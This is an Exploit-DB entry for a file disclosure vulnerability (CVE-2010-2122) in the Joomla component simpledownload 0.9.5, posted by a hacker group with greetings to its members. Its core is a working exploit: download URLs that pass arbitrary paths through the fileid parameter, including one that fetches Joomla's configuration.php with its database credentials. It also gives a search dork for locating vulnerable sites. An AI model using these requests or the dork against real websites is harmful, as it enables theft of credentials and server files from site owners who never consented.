Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Author: ALTBTA
type: webapps
platform: php
port: 
date_added: 2010-05-15 
date_updated: 2016-12-20 
verified: 1 
codes: CVE-2010-2122;OSVDB-64743 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcom_simpledownload_0.9.5.zip

[!]==========================================[!]

[~] Joomla Component simpledownload Remote File Disclouse
[~] Author : altbta (l_9@hotmail.com)
[~] Homepage : [ v4-team.com ] & [ xp10.me ]
[~] Date : 16 Mei, 2010

[!]==========================================[!]

[ Software Information ]

[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : Remote File Disclouse
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected

[!]==========================================[!]

===[ Exploit ]===

http://site/index.php?option=com_simpledownload&task=download&fileid=[file]
http://site/index.php?option=com_simpledownload&task=download&fileid=/configuration.php

[!]=========~~{  altbta }~~=========[!]

RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & &#1575;&#1576;&#1608; &#1575;&#1604;&#1580;&#1575;&#1586;&#1610; & &#1575;&#1608;&#1585;&#1606;&#1580; &#1605;&#1575;&#1606;